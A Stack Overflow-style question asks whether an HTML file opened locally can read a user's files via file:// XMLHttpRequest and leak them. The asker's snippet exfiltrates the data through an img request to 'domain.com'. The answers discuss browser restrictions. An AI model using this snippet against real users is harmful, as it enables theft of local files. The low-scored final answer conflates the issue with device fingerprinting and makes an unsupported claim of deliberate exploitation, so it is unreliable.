# steal user's data by running html file

Tags: javascript, html, security, xmlhttprequest, imagesource

Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:

*info.txt:*

```
my info
```

*index.html:*

```
<!doctype html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $.get('file:///home/daz/desktop/info.txt', function (data) {
          $('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
        }, 'text');
      });
    </script>
  </head>    
  <body></body>
</html>
```

Some browers (firefox, for example) allow you to get files from `file://` through `XmlHttpRequest`, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add `img` tag with `src` leading to my domain with parameters in query string. And browser make a request obediently `GET ?data=my%20info%0A domain.com`. And on the server side I can parse query string and get the data.

***Am I right I can do this? Am I right I can get user's data from his computer if he opens my html file? So I can just say: "Hey, friend, check out this file!"*** (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).

***UPDATED:***

If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.

***UPDATED 2:***

It will be great if someone make a review about this issue. Thanks in advance!

Comment: Yes, this is entirely possible.

Answer (score 5, accepted):

It's less possible than you might think. Various browsers have implemented different restrictions on what local HTML files can do, as described in this post by the Chromium development team:

http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html

In particular:

- Internet Explorer disables Javascript in local HTML files by default
- Opera places some restrictions on cross-domain access from local files
- Firefox applies subdirectory restrictions to local file access

(Note that this post is from 2008; browsers -- especially Chrome -- may have changed significantly since then.)

Answer (score 0):

Just an update: corporations are now using this exploit to steal the information of millions of users, tracking them without their knowledge and without using cookies. http://en.wikipedia.org/wiki/Device_fingerprint

It seems this flaw was intentionally left in their just so users could be exploited.